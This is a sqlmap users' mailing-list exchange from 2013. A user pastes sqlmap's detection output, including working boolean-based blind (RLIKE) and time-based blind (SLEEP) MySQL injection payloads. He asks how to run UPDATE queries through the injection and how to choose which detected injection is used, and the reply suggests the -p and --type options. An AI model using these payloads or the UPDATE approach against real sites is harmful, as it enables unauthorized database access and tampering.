On Monday, February 18, 2013, Bruno Garcia wrote:
> Hello,
>
> I have this injection:
>
> Place: POST
> Parameter: xxxxx
> Type: boolean-based blind
> Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause (RLIKE)
> Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
> 'qGgA'='qGgA
> Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 OR time-based blind
> Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
> Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>
>
> and I get this when using UPDATE
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported.
>
> Is there any workaround for this?
> Also, it shows that it detected two injections, and it's using the first
> one for doing the queries, is there anyway I could test the queries with
> the second injection?
>
Hello,
I am not at a computer now, so this is out of my head.
If you want to test a specific parameter, use -p parameter_name , if you
want to use a specific injection type that was detected, use --type=E as an
example for error based injection.
--
Regards
L.
Sent using electronic mail ツ
------------------------------------------------------------------------------
The Go Parallel Website, sponsored by Intel - in partnership with Geeknet,
is your hub for all things parallel software development, from weekly thought
leadership blogs to news, videos, case studies, tutorials, tech docs,
whitepapers, evaluation guides, and opinion stories. Check out the most
recent posts - join the conversation now. http://goparallel.sourceforge.net/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
